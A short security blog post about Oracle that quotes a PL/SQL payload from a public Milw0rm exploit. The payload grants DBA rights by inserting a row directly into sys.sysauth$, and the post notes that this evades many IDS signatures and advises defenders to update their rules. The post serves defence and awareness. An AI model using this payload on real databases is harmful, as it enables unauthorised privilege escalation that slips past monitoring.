Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)

Three Tier Oracle Security in London ~ Paul M. Wright RSS Feed
 

Interesting Payload to PLSQL exploit at Milw0rm

Interesting exploit payload below.

http://www.milw0rm.com/exploits/3177

——————————–

v_commands := 'insert into sys.sysauth$ ' ||
' values' ||
'(' || v_user_id || ',4,' ||
'999,null)';

——————————-

Instead of grant dba to scott the exploit payload inserts the values into sysauth$.

This will bypass many IDS signatures. David mentioned this to me quite a while ago and it is now public so better update those IDS rules.

Leave a Reply

You must be logged in to post a comment.